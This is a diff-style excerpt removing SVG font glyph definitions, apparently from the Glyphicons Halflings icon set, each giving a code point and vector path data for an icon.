-<glyph unicode="&#xe063;" d="M1 600q0 122 47.5 233t127.5 191t191 127.5t233 47.5t233 -47.5t191 -127.5t127.5 -191t47.5 -233t-47.5 -233t-127.5 -191t-191 -127.5t-233 -47.5t-233 47.5t-191 127.5t-127.5 191t-47.5 233zM173 600q0 -177 125.5 -302t301.5 -125v854q-176 0 -301.5 -125 t-125.5 -302z" />
-<glyph unicode="&#xe064;" d="M117 406q0 94 34 186t88.5 172.5t112 159t115 177t87.5 194.5q21 -71 57.5 -142.5t76 -130.5t83 -118.5t82 -117t70 -116t50 -125.5t18.5 -136q0 -89 -39 -165.5t-102 -126.5t-140 -79.5t-156 -33.5q-114 6 -211.5 53t-161.5 138.5t-64 210.5zM243 414q14 -82 59.5 -136 t136.5 -80l16 98q-7 6 -18 17t-34 48t-33 77q-15 73 -14 143.5t10 122.5l9 51q-92 -110 -119.5 -185t-12.5 -156z" />
-<glyph unicode="&#xe065;" d="M0 400v300q0 165 117.5 282.5t282.5 117.5q366 -6 397 -14l-186 -186h-311q-41 0 -70.5 -29.5t-29.5 -70.5v-500q0 -41 29.5 -70.5t70.5 -29.5h500q41 0 70.5 29.5t29.5 70.5v125l200 200v-225q0 -165 -117.5 -282.5t-282.5 -117.5h-300q-165 0 -282.5 117.5 t-117.5 282.5zM436 341l161 50l412 412l-114 113l-405 -405zM995 1015l113 -113l113 113l-21 85l-92 28z" />
-<glyph unicode="&#xe066;" d="M0 400v300q0 165 117.5 282.5t282.5 117.5h261l2 -80q-133 -32 -218 -120h-145q-41 0 -70.5 -29.5t-29.5 -70.5v-500q0 -41 29.5 -70.5t70.5 -29.5h500q41 0 70.5 29.5t29.5 70.5l200 153v-53q0 -165 -117.5 -282.5t-282.5 -117.5h-300q-165 0 -282.5 117.5t-117.5 282.5 zM423 524q30 38 81.5 64t103 35.5t99 14t77.5 3.5l29 -1v-209l360 324l-359 318v-216q-7 0 -19 -1t-48 -8t-69.5 -18.5t-76.5 -37t-76.5 -59t-62 -88t-39.5 -121.5z" />
-<glyph unicode="&#xe067;" d="M0 400v300q0 165 117.5 282.5t282.5 117.5h300q60 0 127 -23l-178 -177h-349q-41 0 -70.5 -29.5t-29.5 -70.5v-500q0 -41 29.5 -70.5t70.5 -29.5h500q41 0 70.5 29.5t29.5 70.5v69l200 200v-169q0 -165 -117.5 -282.5t-282.5 -117.5h-300q-165 0 -282.5 117.5 t-117.5 282.5zM342 632l283 -284l566 567l-136 137l-430 -431l-147 147z" />
-<glyph unicode="&#xe068;" d="M0 603l300 296v-198h200v200h-200l300 300l295 -300h-195v-200h200v198l300 -296l-300 -300v198h-200v-200h195l-295 -300l-300 300h200v200h-200v-198z" />
-<glyph unicode="&#xe069;" d="M200 50v1000q0 21 14.5 35.5t35.5 14.5h100q21 0 35.5 -14.5t14.5 -35.5v-437l500 487v-1100l-500 488v-438q0 -21 -14.5 -35.5t-35.5 -14.5h-100q-21 0 -35.5 14.5t-14.5 35.5z" />
-<glyph unicode="&#xe070;" d="M0 50v1000q0 21 14.5 35.5t35.5 14.5h100q21 0 35.5 -14.5t14.5 -35.5v-437l500 487v-487l500 487v-1100l-500 488v-488l-500 488v-438q0 -21 -14.5 -35.5t-35.5 -14.5h-100q-21 0 -35.5 14.5t-14.5 35.5z" />
-<glyph unicode="&#xe071;" d="M136 550l564 550v-487l500 487v-1100l-500 488v-488z" />
-<glyph unicode="&#xe072;" d="M200 0l900 550l-900 550v-1100z" />
-<glyph unicode="&#xe073;" d="M200 150q0 -21 14.5 -35.5t35.5 -14.5h200q21 0 35.5 14.5t14.5 35.5v800q0 21 -14.5 35.5t-35.5 14.5h-200q-21 0 -35.5 -14.5t-14.5 -35.5v-800zM600 150q0 -21 14.5 -35.5t35.5 -14.5h200q21 0 35.5 14.5t14.5 35.5v800q0 21 -14.5 35.5t-35.5 14.5h-200 q-21 0 -35.5 -14.5t-14.5 -35.5v-800z" />
-<glyph unicode="&#xe074;" d="M200 150q0 -20 14.5 -35t35.5 -15h800q21 0 35.5 15t14.5 35v800q0 21 -14.5 35.5t-35.5 14.5h-800q-21 0 -35.5 -14.5t-14.5 -35.5v-800z" />
-<glyph unicode="&#xe075;" d="M0 0v1100l500 -487v487l564 -550l-564 -550v488z" />
-<glyph unicode="&#xe076;" d="M0 0v1100l500 -487v487l500 -487v437q0 21 14.5 35.5t35.5 14.5h100q21 0 35.5 -14.5t14.5 -35.5v-1000q0 -21 -14.5 -35.5t-35.5 -14.5h-100q-21 0 -35.5 14.5t-14.5 35.5v438l-500 -488v488z" />
-<glyph unicode="&#xe077;" d="M300 0v1100l500 -487v437q0 21 14.5 35.5t35.5 14.5h100q21 0 35.5 -14.5t14.5 -35.5v-1000q0 -21 -14.5 -35.5t-35.5 -14.5h-100q-21 0 -35.5 14.5t-14.5 35.5v438z" />
-<glyph unicode="&#xe078;" d="M100 250v100q0 21 14.5 35.5t35.5 14.5h1000q21 0 35.5 -14.5t14.5 -35.5v-100q0 -21 -14.5 -35.5t-35.5 -14.5h-1000q-21 0 -35.5 14.5t-14.5 35.5zM100 500h1100l-550 564z" />
-<glyph unicode="&#xe079;" d="M185 599l592 -592l240 240l-353 353l353 353l-240 240z" />
-<glyph unicode="&#xe080;" d="M272 194l353 353l-353 353l241 240l572 -571l21 -22l-1 -1v-1l-592 -591z" />
-<glyph unicode="&#xe081;" d="M3 600q0 162 80 299.5t217.5 217.5t299.5 80t299.5 -80t217.5 -217.5t80 -299.5t-80 -300t-217.5 -218t-299.5 -80t-299.5 80t-217.5 218t-80 300zM300 500h200v-200h200v200h200v200h-200v200h-200v-200h-200v-200z" />
-<glyph unicode="&#xe082;" d="M3 600q0 162 80 299.5t217.5 217.5t299.5 80t299.5 -80t217.5 -217.5t80 -299.5t-80 -300t-217.5 -218t-299.5 -80t-299.5 80t-217.5 218t-80 300zM300 500h600v200h-600v-200z" />
-<glyph unicode="&#xe083;" d="M3 600q0 162 80 299.5t217.5 217.5t299.5 80t299.5 -80t217.5 -217.5t80 -299.5t-80 -300t-217.5 -218t-299.5 -80t-299.5 80t-217.5 218t-80 300zM246 459l213 -213l141 142l141 -142l213 213l-142 141l142 141l-213 212l-141 -141l-141 142l-212 -213l141 -141z" />
-<glyph unicode="&#xe084;" d="M3 600q0 162 80 299.5t217.5 217.5t299.5 80t299.5 -80t217.5 -217.5t80 -299.5t-80 -299.5t-217.5 -217.5t-299.5 -80t-299.5 80t-217.5 217.5t-80 299.5zM270 551l276 -277l411 411l-175 174l-236 -236l-102 102z" />
-<glyph unicode="&#xe085;" d="M3 600q0 162 80 299.5t217.5 217.5t299.5 80t299.5 -80t217.5 -217.5t80 -299.5t-80 -300t-217.5 -218t-299.5 -80t-299.5 80t-217.5 218t-80 300zM363 700h144q4 0 11.5 -1t11 -1t6.5 3t3 9t1 11t3.5 8.5t3.5 6t5.5 4t6.5 2.5t9 1.5t9 0.5h11.5h12.5q19 0 30 -10t11 -26 q0 -22 -4 -28t-27 -22q-5 -1 -12.5 -3t-27 -13.5t-34 -27t-26.5 -46t-11 -68.5h200q5 3 14 8t31.5 25.5t39.5 45.5t31 69t14 94q0 51 -17.5 89t-42 58t-58.5 32t-58.5 15t-51.5 3q-105 0 -172 -56t-67 -183zM500 300h200v100h-200v-100z" />
-<glyph unicode="&#xe086;" d="M3 600q0 162 80 299.5t217.5 217.5t299.5 80t299.5 -80t217.5 -217.5t80 -299.5t-80 -300t-217.5 -218t-299.5 -80t-299.5 80t-217.5 218t-80 300zM400 300h400v100h-100v300h-300v-100h100v-200h-100v-100zM500 800h200v100h-200v-100z" />
-<glyph unicode="&#xe087;" d="M0 500v200h194q15 60 36 104.5t55.5 86t88 69t126.5 40.5v200h200v-200q54 -20 113 -60t112.5 -105.5t71.5 -134.5h203v-200h-203q-25 -102 -116.5 -186t-180.5 -117v-197h-200v197q-140 27 -208 102.5t-98 200.5h-194zM290 500q24 -73 79.5 -127.5t130.5 -78.5v206h200 v-206q149 48 201 206h-201v200h200q-25 74 -76 127.5t-124 76.5v-204h-200v203q-75 -24 -130 -77.5t-79 -125.5h209v-200h-210z" />
-<glyph unicode="&#xe088;" d="M4 600q0 162 80 299t217 217t299 80t299 -80t217 -217t80 -299t-80 -299t-217 -217t-299 -80t-299 80t-217 217t-80 299zM186 600q0 -171 121.5 -292.5t292.5 -121.5t292.5 121.5t121.5 292.5t-121.5 292.5t-292.5 121.5t-292.5 -121.5t-121.5 -292.5zM356 465l135 135 l-135 135l109 109l135 -135l135 135l109 -109l-135 -135l135 -135l-109 -109l-135 135l-135 -135z" />
-<glyph unicode="&#xe089;" d="M4 600q0 162 80 299t217 217t299 80t299 -80t217 -217t80 -299t-80 -299t-217 -217t-299 -80t-299 80t-217 217t-80 299zM186 600q0 -171 121.5 -292.5t292.5 -121.5t292.5 121.5t121.5 292.5t-121.5 292.5t-292.5 121.5t-292.5 -121.5t-121.5 -292.5zM322 537l141 141 l87 -87l204 205l142 -142l-346 -345z" />
-<glyph unicode="&#xe090;" d="M4 600q0 162 80 299t217 217t299 80t299 -80t217 -217t80 -299t-80 -299t-217 -217t-299 -80t-299 80t-217 217t-80 299zM186 600q0 -115 62 -215l568 567q-100 62 -216 62q-171 0 -292.5 -121.5t-121.5 -292.5zM391 245q97 -59 209 -59q171 0 292.5 121.5t121.5 292.5 q0 112 -59 209z" />
-<glyph unicode="&#xe091;" d="M0 547l600 453v-300h600v-300h-600v-301z" />
-<glyph unicode="&#xe092;" d="M0 400v300h600v300l600 -453l-600 -448v301h-600z" />
-<glyph unicode="&#xe093;" d="M204 600l450 600l444 -600h-298v-600h-300v600h-296z" />
-<glyph unicode="&#xe094;" d="M104 600h296v600h300v-600h298l-449 -600z" />
-<glyph unicode="&#xe095;" d="M0 200q6 132 41 238.5t103.5 193t184 138t271.5 59.5v271l600 -453l-600 -448v301q-95 -2 -183 -20t-170 -52t-147 -92.5t-100 -135.5z" />
-<glyph unicode="&#xe096;" d="M0 0v400l129 -129l294 294l142 -142l-294 -294l129 -129h-400zM635 777l142 -142l294 294l129 -129v400h-400l129 -129z" />
-<glyph unicode="&#xe097;" d="M34 176l295 295l-129 129h400v-400l-129 130l-295 -295zM600 600v400l129 -129l295 295l142 -141l-295 -295l129 -130h-400z" />
-<glyph unicode="&#xe101;" d="M23 600q0 118 45.5 224.5t123 184t184 123t224.5 45.5t224.5 -45.5t184 -123t123 -184t45.5 -224.5t-45.5 -224.5t-123 -184t-184 -123t-224.5 -45.5t-224.5 45.5t-184 123t-123 184t-45.5 224.5zM456 851l58 -302q4 -20 21.5 -34.5t37.5 -14.5h54q20 0 37.5 14.5 t21.5 34.5l58 302q4 20 -8 34.5t-33 14.5h-207q-20 0 -32 -14.5t-8 -34.5zM500 300h200v100h-200v-100z" />
-<glyph unicode="&#xe102;" d="M0 800h100v-200h400v300h200v-300h400v200h100v100h-111v6t-1 15t-3 18l-34 172q-11 39 -41.5 63t-69.5 24q-32 0 -61 -17l-239 -144q-22 -13 -40 -35q-19 24 -40 36l-238 144q-33 18 -62 18q-39 0 -69.5 -23t-40.5 -61l-35 -177q-2 -8 -3 -18t-1 -15v-6h-111v-100z M100 0h400v400h-400v-400zM200 900q-3 0 14 48t35 96l18 47l214 -191h-281zM700 0v400h400v-400h-400zM731 900l202 197q5 -12 12 -32.5t23 -64t25 -72t7 -28.5h-269z" />
-<glyph unicode="&#xe103;" d="M0 -22v143l216 193q-9 53 -13 83t-5.5 94t9 113t38.5 114t74 124q47 60 99.5 102.5t103 68t127.5 48t145.5 37.5t184.5 43.5t220 58.5q0 -189 -22 -343t-59 -258t-89 -181.5t-108.5 -120t-122 -68t-125.5 -30t-121.5 -1.5t-107.5 12.5t-87.5 17t-56.5 7.5l-99 -55z M238.5 300.5q19.5 -6.5 86.5 76.5q55 66 367 234q70 38 118.5 69.5t102 79t99 111.5t86.5 148q22 50 24 60t-6 19q-7 5 -17 5t-26.5 -14.5t-33.5 -39.5q-35 -51 -113.5 -108.5t-139.5 -89.5l-61 -32q-369 -197 -458 -401q-48 -111 -28.5 -117.5z" />
-<glyph unicode="&#xe104;" d="M111 408q0 -33 5 -63q9 -56 44 -119.5t105 -108.5q31 -21 64 -16t62 23.5t57 49.5t48 61.5t35 60.5q32 66 39 184.5t-13 157.5q79 -80 122 -164t26 -184q-5 -33 -20.5 -69.5t-37.5 -80.5q-10 -19 -14.5 -29t-12 -26t-9 -23.5t-3 -19t2.5 -15.5t11 -9.5t19.5 -5t30.5 2.5 t42 8q57 20 91 34t87.5 44.5t87 64t65.5 88.5t47 122q38 172 -44.5 341.5t-246.5 278.5q22 -44 43 -129q39 -159 -32 -154q-15 2 -33 9q-79 33 -120.5 100t-44 175.5t48.5 257.5q-13 -8 -34 -23.5t-72.5 -66.5t-88.5 -105.5t-60 -138t-8 -166.5q2 -12 8 -41.5t8 -43t6 -39.5 t3.5 -39.5t-1 -33.5t-6 -31.5t-13.5 -24t-21 -20.5t-31 -12q-38 -10 -67 13t-40.5 61.5t-15 81.5t10.5 75q-52 -46 -83.5 -101t-39 -107t-7.5 -85z" />
-<glyph unicode="&#xe105;" d="M-61 600l26 40q6 10 20 30t49 63.5t74.5 85.5t97 90t116.5 83.5t132.5 59t145.5 23.5t145.5 -23.5t132.5 -59t116.5 -83.5t97 -90t74.5 -85.5t49 -63.5t20 -30l26 -40l-26 -40q-6 -10 -20 -30t-49 -63.5t-74.5 -85.5t-97 -90t-116.5 -83.5t-132.5 -59t-145.5 -23.5 t-145.5 23.5t-132.5 59t-116.5 83.5t-97 90t-74.5 85.5t-49 63.5t-20 30zM120 600q7 -10 40.5 -58t56 -78.5t68 -77.5t87.5 -75t103 -49.5t125 -21.5t123.5 20t100.5 45.5t85.5 71.5t66.5 75.5t58 81.5t47 66q-1 1 -28.5 37.5t-42 55t-43.5 53t-57.5 63.5t-58.5 54 q49 -74 49 -163q0 -124 -88 -212t-212 -88t-212 88t-88 212q0 85 46 158q-102 -87 -226 -258zM377 656q49 -124 154 -191l105 105q-37 24 -75 72t-57 84l-20 36z" />
-<glyph unicode="&#xe106;" d="M-61 600l26 40q6 10 20 30t49 63.5t74.5 85.5t97 90t116.5 83.5t132.5 59t145.5 23.5q61 0 121 -17l37 142h148l-314 -1200h-148l37 143q-82 21 -165 71.5t-140 102t-109.5 112t-72 88.5t-29.5 43zM120 600q210 -282 393 -336l37 141q-107 18 -178.5 101.5t-71.5 193.5 q0 85 46 158q-102 -87 -226 -258zM377 656q49 -124 154 -191l47 47l23 87q-30 28 -59 69t-44 68l-14 26zM780 161l38 145q22 15 44.5 34t46 44t40.5 44t41 50.5t33.5 43.5t33 44t24.5 34q-97 127 -140 175l39 146q67 -54 131.5 -125.5t87.5 -103.5t36 -52l26 -40l-26 -40 q-7 -12 -25.5 -38t-63.5 -79.5t-95.5 -102.5t-124 -100t-146.5 -79z" />
-<glyph unicode="&#xe107;" d="M-97.5 34q13.5 -34 50.5 -34h1294q37 0 50.5 35.5t-7.5 67.5l-642 1056q-20 33 -48 36t-48 -29l-642 -1066q-21 -32 -7.5 -66zM155 200l445 723l445 -723h-345v100h-200v-100h-345zM500 600l100 -300l100 300v100h-200v-100z" />
-<glyph unicode="&#xe108;" d="M100 262v41q0 20 11 44.5t26 38.5l363 325v339q0 62 44 106t106 44t106 -44t44 -106v-339l363 -325q15 -14 26 -38.5t11 -44.5v-41q0 -20 -12 -26.5t-29 5.5l-359 249v-263q100 -91 100 -113v-64q0 -21 -13 -29t-32 1l-94 78h-222l-94 -78q-19 -9 -32 -1t-13 29v64 q0 22 100 113v263l-359 -249q-17 -12 -29 -5.5t-12 26.5z" />
-<glyph unicode="&#xe109;" d="M0 50q0 -20 14.5 -35t35.5 -15h1000q21 0 35.5 15t14.5 35v750h-1100v-750zM0 900h1100v150q0 21 -14.5 35.5t-35.5 14.5h-150v100h-100v-100h-500v100h-100v-100h-150q-21 0 -35.5 -14.5t-14.5 -35.5v-150zM100 100v100h100v-100h-100zM100 300v100h100v-100h-100z M100 500v100h100v-100h-100zM300 100v100h100v-100h-100zM300 300v100h100v-100h-100zM300 500v100h100v-100h-100zM500 100v100h100v-100h-100zM500 300v100h100v-100h-100zM500 500v100h100v-100h-100zM700 100v100h100v-100h-100zM700 300v100h100v-100h-100zM700 500 v100h100v-100h-100zM900 100v100h100v-100h-100zM900 300v100h100v-100h-100zM900 500v100h100v-100h-100z" />
-<glyph unicode="&#xe110;" d="M0 200v200h259l600 600h241v198l300 -295l-300 -300v197h-159l-600 -600h-341zM0 800h259l122 -122l141 142l-181 180h-341v-200zM678 381l141 142l122 -123h159v198l300 -295l-300 -300v197h-241z" />
-<glyph unicode="&#xe111;" d="M0 400v600q0 41 29.5 70.5t70.5 29.5h1000q41 0 70.5 -29.5t29.5 -70.5v-600q0 -41 -29.5 -70.5t-70.5 -29.5h-596l-304 -300v300h-100q-41 0 -70.5 29.5t-29.5 70.5z" />
-<glyph unicode="&#xe112;" d="M100 600v200h300v-250q0 -113 6 -145q17 -92 102 -117q39 -11 92 -11q37 0 66.5 5.5t50 15.5t36 24t24 31.5t14 37.5t7 42t2.5 45t0 47v25v250h300v-200q0 -42 -3 -83t-15 -104t-31.5 -116t-58 -109.5t-89 -96.5t-129 -65.5t-174.5 -25.5t-174.5 25.5t-129 65.5t-89 96.5 t-58 109.5t-31.5 116t-15 104t-3 83zM100 900v300h300v-300h-300zM800 900v300h300v-300h-300z" />
-<glyph unicode="&#xe113;" d="M-30 411l227 -227l352 353l353 -353l226 227l-578 579z" />
-<glyph unicode="&#xe114;" d="M70 797l580 -579l578 579l-226 227l-353 -353l-352 353z" />
-<glyph unicode="&#xe115;" d="M-198 700l299 283l300 -283h-203v-400h385l215 -200h-800v600h-196zM402 1000l215 -200h381v-400h-198l299 -283l299 283h-200v600h-796z" />
-<glyph unicode="&#xe116;" d="M18 939q-5 24 10 42q14 19 39 19h896l38 162q5 17 18.5 27.5t30.5 10.5h94q20 0 35 -14.5t15 -35.5t-15 -35.5t-35 -14.5h-54l-201 -961q-2 -4 -6 -10.5t-19 -17.5t-33 -11h-31v-50q0 -20 -14.5 -35t-35.5 -15t-35.5 15t-14.5 35v50h-300v-50q0 -20 -14.5 -35t-35.5 -15 t-35.5 15t-14.5 35v50h-50q-21 0 -35.5 15t-14.5 35q0 21 14.5 35.5t35.5 14.5h535l48 200h-633q-32 0 -54.5 21t-27.5 43z" />
-<glyph unicode="&#xe117;" d="M0 0v800h1200v-800h-1200zM0 900v100h200q0 41 29.5 70.5t70.5 29.5h300q41 0 70.5 -29.5t29.5 -70.5h500v-100h-1200z" />
-<glyph unicode="&#xe118;" d="M1 0l300 700h1200l-300 -700h-1200zM1 400v600h200q0 41 29.5 70.5t70.5 29.5h300q41 0 70.5 -29.5t29.5 -70.5h500v-200h-1000z" />
-<glyph unicode="&#xe119;" d="M302 300h198v600h-198l298 300l298 -300h-198v-600h198l-298 -300z" />
-<glyph unicode="&#xe120;" d="M0 600l300 298v-198h600v198l300 -298l-300 -297v197h-600v-197z" />
-<glyph unicode="&#xe121;" d="M0 100v100q0 41 29.5 70.5t70.5 29.5h1000q41 0 70.5 -29.5t29.5 -70.5v-100q0 -41 -29.5 -70.5t-70.5 -29.5h-1000q-41 0 -70.5 29.5t-29.5 70.5zM31 400l172 739q5 22 23 41.5t38 19.5h672q19 0 37.5 -22.5t23.5 -45.5l172 -732h-1138zM800 100h100v100h-100v-100z M1000 100h100v100h-100v-100z" />
-<glyph unicode="&#xe122;" d="M-101 600v50q0 24 25 49t50 38l25 13v-250l-11 5.5t-24 14t-30 21.5t-24 27.5t-11 31.5zM99 500v250v5q0 13 0.5 18.5t2.5 13t8 10.5t15 3h200l675 250v-850l-675 200h-38l47 -276q2 -12 -3 -17.5t-11 -6t-21 -0.5h-8h-83q-20 0 -34.5 14t-18.5 35q-56 337 -56 351z M1100 200v850q0 21 14.5 35.5t35.5 14.5q20 0 35 -14.5t15 -35.5v-850q0 -20 -15 -35t-35 -15q-21 0 -35.5 15t-14.5 35z" />
-<glyph unicode="&#xe123;" d="M74 350q0 21 13.5 35.5t33.5 14.5h17l118 173l63 327q15 77 76 140t144 83l-18 32q-6 19 3 32t29 13h94q20 0 29 -10.5t3 -29.5l-18 -37q83 -19 144 -82.5t76 -140.5l63 -327l118 -173h17q20 0 33.5 -14.5t13.5 -35.5q0 -20 -13 -40t-31 -27q-22 -9 -63 -23t-167.5 -37 t-251.5 -23t-245.5 20.5t-178.5 41.5l-58 20q-18 7 -31 27.5t-13 40.5zM497 110q12 -49 40 -79.5t63 -30.5t63 30.5t39 79.5q-48 -6 -102 -6t-103 6z" />
-<glyph unicode="&#xe124;" d="M21 445l233 -45l-78 -224l224 78l45 -233l155 179l155 -179l45 233l224 -78l-78 224l234 45l-180 155l180 156l-234 44l78 225l-224 -78l-45 233l-155 -180l-155 180l-45 -233l-224 78l78 -225l-233 -44l179 -156z" />
-<glyph unicode="&#xe125;" d="M0 200h200v600h-200v-600zM300 275q0 -75 100 -75h61q123 -100 139 -100h250q46 0 83 57l238 344q29 31 29 74v100q0 44 -30.5 84.5t-69.5 40.5h-328q28 118 28 125v150q0 44 -30.5 84.5t-69.5 40.5h-50q-27 0 -51 -20t-38 -48l-96 -198l-145 -196q-20 -26 -20 -63v-400z M400 300v375l150 212l100 213h50v-175l-50 -225h450v-125l-250 -375h-214l-136 100h-100z" />
-<glyph unicode="&#xe126;" d="M0 400v600h200v-600h-200zM300 525v400q0 75 100 75h61q123 100 139 100h250q46 0 83 -57l238 -344q29 -31 29 -74v-100q0 -44 -30.5 -84.5t-69.5 -40.5h-328q28 -118 28 -125v-150q0 -44 -30.5 -84.5t-69.5 -40.5h-50q-27 0 -51 20t-38 48l-96 198l-145 196 q-20 26 -20 63zM400 525l150 -212l100 -213h50v175l-50 225h450v125l-250 375h-214l-136 -100h-100v-375z" />
-<glyph unicode="&#xe127;" d="M8 200v600h200v-600h-200zM308 275v525q0 17 14 35.5t28 28.5l14 9l362 230q14 6 25 6q17 0 29 -12l109 -112q14 -14 14 -34q0 -18 -11 -32l-85 -121h302q85 0 138.5 -38t53.5 -110t-54.5 -111t-138.5 -39h-107l-130 -339q-7 -22 -20.5 -41.5t-28.5 -19.5h-341 q-7 0 -90 81t-83 94zM408 289l100 -89h293l131 339q6 21 19.5 41t28.5 20h203q16 0 25 15t9 36q0 20 -9 34.5t-25 14.5h-457h-6.5h-7.5t-6.5 0.5t-6 1t-5 1.5t-5.5 2.5t-4 4t-4 5.5q-5 12 -5 20q0 14 10 27l147 183l-86 83l-339 -236v-503z" />
-<glyph unicode="&#xe128;" d="M-101 651q0 72 54 110t139 37h302l-85 121q-11 16 -11 32q0 21 14 34l109 113q13 12 29 12q11 0 25 -6l365 -230q7 -4 16.5 -10.5t26 -26t16.5 -36.5v-526q0 -13 -85.5 -93.5t-93.5 -80.5h-342q-15 0 -28.5 20t-19.5 41l-131 339h-106q-84 0 -139 39t-55 111zM-1 601h222 q15 0 28.5 -20.5t19.5 -40.5l131 -339h293l106 89v502l-342 237l-87 -83l145 -184q10 -11 10 -26q0 -11 -5 -20q-1 -3 -3.5 -5.5l-4 -4t-5 -2.5t-5.5 -1.5t-6.5 -1t-6.5 -0.5h-7.5h-6.5h-476v-100zM999 201v600h200v-600h-200z" />
-<glyph unicode="&#xe129;" d="M97 719l230 -363q4 -6 10.5 -15.5t26 -25t36.5 -15.5h525q13 0 94 83t81 90v342q0 15 -20 28.5t-41 19.5l-339 131v106q0 84 -39 139t-111 55t-110 -53.5t-38 -138.5v-302l-121 84q-15 12 -33.5 11.5t-32.5 -13.5l-112 -110q-22 -22 -6 -53zM172 739l83 86l183 -146 q22 -18 47 -5q3 1 5.5 3.5l4 4t2.5 5t1.5 5.5t1 6.5t0.5 6v7.5v7v456q0 22 25 31t50 -0.5t25 -30.5v-202q0 -16 20 -29.5t41 -19.5l339 -130v-294l-89 -100h-503zM400 0v200h600v-200h-600z" />
-<glyph unicode="&#xe130;" d="M1 585q-15 -31 7 -53l112 -110q13 -13 32 -13.5t34 10.5l121 85l-1 -302q0 -84 38.5 -138t110.5 -54t111 55t39 139v106l339 131q20 6 40.5 19.5t20.5 28.5v342q0 7 -81 90t-94 83h-525q-17 0 -35.5 -14t-28.5 -28l-10 -15zM76 565l237 339h503l89 -100v-294l-340 -130 q-20 -6 -40 -20t-20 -29v-202q0 -22 -25 -31t-50 0t-25 31v456v14.5t-1.5 11.5t-5 12t-9.5 7q-24 13 -46 -5l-184 -146zM305 1104v200h600v-200h-600z" />
-<glyph unicode="&#xe131;" d="M5 597q0 122 47.5 232.5t127.5 190.5t190.5 127.5t232.5 47.5q162 0 299.5 -80t217.5 -218t80 -300t-80 -299.5t-217.5 -217.5t-299.5 -80t-300 80t-218 217.5t-80 299.5zM300 500h300l-2 -194l402 294l-402 298v-197h-298v-201z" />
-<glyph unicode="&#xe132;" d="M0 597q0 122 47.5 232.5t127.5 190.5t190.5 127.5t231.5 47.5q122 0 232.5 -47.5t190.5 -127.5t127.5 -190.5t47.5 -232.5q0 -162 -80 -299.5t-218 -217.5t-300 -80t-299.5 80t-217.5 217.5t-80 299.5zM200 600l400 -294v194h302v201h-300v197z" />
-<glyph unicode="&#xe133;" d="M5 597q0 122 47.5 232.5t127.5 190.5t190.5 127.5t232.5 47.5q121 0 231.5 -47.5t190.5 -127.5t127.5 -190.5t47.5 -232.5q0 -162 -80 -299.5t-217.5 -217.5t-299.5 -80t-300 80t-218 217.5t-80 299.5zM300 600h200v-300h200v300h200l-300 400z" />
-<glyph unicode="&#xe134;" d="M5 597q0 122 47.5 232.5t127.5 190.5t190.5 127.5t232.5 47.5q121 0 231.5 -47.5t190.5 -127.5t127.5 -190.5t47.5 -232.5q0 -162 -80 -299.5t-217.5 -217.5t-299.5 -80t-300 80t-218 217.5t-80 299.5zM300 600l300 -400l300 400h-200v300h-200v-300h-200z" />
-<glyph unicode="&#xe135;" d="M5 597q0 122 47.5 232.5t127.5 190.5t190.5 127.5t232.5 47.5q121 0 231.5 -47.5t190.5 -127.5t127.5 -190.5t47.5 -232.5q0 -162 -80 -299.5t-217.5 -217.5t-299.5 -80t-300 80t-218 217.5t-80 299.5zM254 780q-8 -34 5.5 -93t7.5 -87q0 -9 17 -44t16 -60q12 0 23 -5.5 t23 -15t20 -13.5q20 -10 108 -42q22 -8 53 -31.5t59.5 -38.5t57.5 -11q8 -18 -15 -55.5t-20 -57.5q12 -21 22.5 -34.5t28 -27t36.5 -17.5q0 -6 -3 -15.5t-3.5 -14.5t4.5 -17q101 -2 221 111q31 30 47 48t34 49t21 62q-14 9 -37.5 9.5t-35.5 7.5q-14 7 -49 15t-52 19 q-9 0 -39.5 -0.5t-46.5 -1.5t-39 -6.5t-39 -16.5q-50 -35 -66 -12q-4 2 -3.5 25.5t0.5 25.5q-6 13 -26.5 17t-24.5 7q2 22 -2 41t-16.5 28t-38.5 -20q-23 -25 -42 4q-19 28 -8 58q8 16 22 22q6 -1 26 -1.5t33.5 -4.5t19.5 -13q12 -19 32 -37.5t34 -27.5l14 -8q0 3 9.5 39.5 t5.5 57.5q-4 23 14.5 44.5t22.5 31.5q5 14 10 35t8.5 31t15.5 22.5t34 21.5q-6 18 10 37q8 0 23.5 -1.5t24.5 -1.5t20.5 4.5t20.5 15.5q-10 23 -30.5 42.5t-38 30t-49 26.5t-43.5 23q11 41 1 44q31 -13 58.5 -14.5t39.5 3.5l11 4q6 36 -17 53.5t-64 28.5t-56 23 q-19 -3 -37 0q-15 -12 -36.5 -21t-34.5 -12t-44 -8t-39 -6q-15 -3 -46 0t-45 -3q-20 -6 -51.5 -25.5t-34.5 -34.5q-3 -11 6.5 -22.5t8.5 -18.5q-3 -34 -27.5 -91t-29.5 -79zM518 915q3 12 16 30.5t16 25.5q10 -10 18.5 -10t14 6t14.5 14.5t16 12.5q0 -18 8 -42.5t16.5 -44 t9.5 -23.5q-6 1 -39 5t-53.5 10t-36.5 16z" />
-<glyph unicode="&#xe136;" d="M0 164.5q0 21.5 15 37.5l600 599q-33 101 6 201.5t135 154.5q164 92 306 -9l-259 -138l145 -232l251 126q13 -175 -151 -267q-123 -70 -253 -23l-596 -596q-15 -16 -36.5 -16t-36.5 16l-111 110q-15 15 -15 36.5z" />
-<glyph unicode="&#xe137;" horiz-adv-x="1220" d="M0 196v100q0 41 29.5 70.5t70.5 29.5h1000q41 0 70.5 -29.5t29.5 -70.5v-100q0 -41 -29.5 -70.5t-70.5 -29.5h-1000q-41 0 -70.5 29.5t-29.5 70.5zM0 596v100q0 41 29.5 70.5t70.5 29.5h1000q41 0 70.5 -29.5t29.5 -70.5v-100q0 -41 -29.5 -70.5t-70.5 -29.5h-1000 q-41 0 -70.5 29.5t-29.5 70.5zM0 996v100q0 41 29.5 70.5t70.5 29.5h1000q41 0 70.5 -29.5t29.5 -70.5v-100q0 -41 -29.5 -70.5t-70.5 -29.5h-1000q-41 0 -70.5 29.5t-29.5 70.5zM600 596h500v100h-500v-100zM800 196h300v100h-300v-100zM900 996h200v100h-200v-100z" />
-<glyph unicode="&#xe138;" d="M100 1100v100h1000v-100h-1000zM150 1000h900l-350 -500v-300l-200 -200v500z" />
-<glyph unicode="&#xe139;" d="M0 200v200h1200v-200q0 -41 -29.5 -70.5t-70.5 -29.5h-1000q-41 0 -70.5 29.5t-29.5 70.5zM0 500v400q0 41 29.5 70.5t70.5 29.5h300v100q0 41 29.5 70.5t70.5 29.5h200q41 0 70.5 -29.5t29.5 -70.5v-100h300q41 0 70.5 -29.5t29.5 -70.5v-400h-500v100h-200v-100h-500z M500 1000h200v100h-200v-100z" />
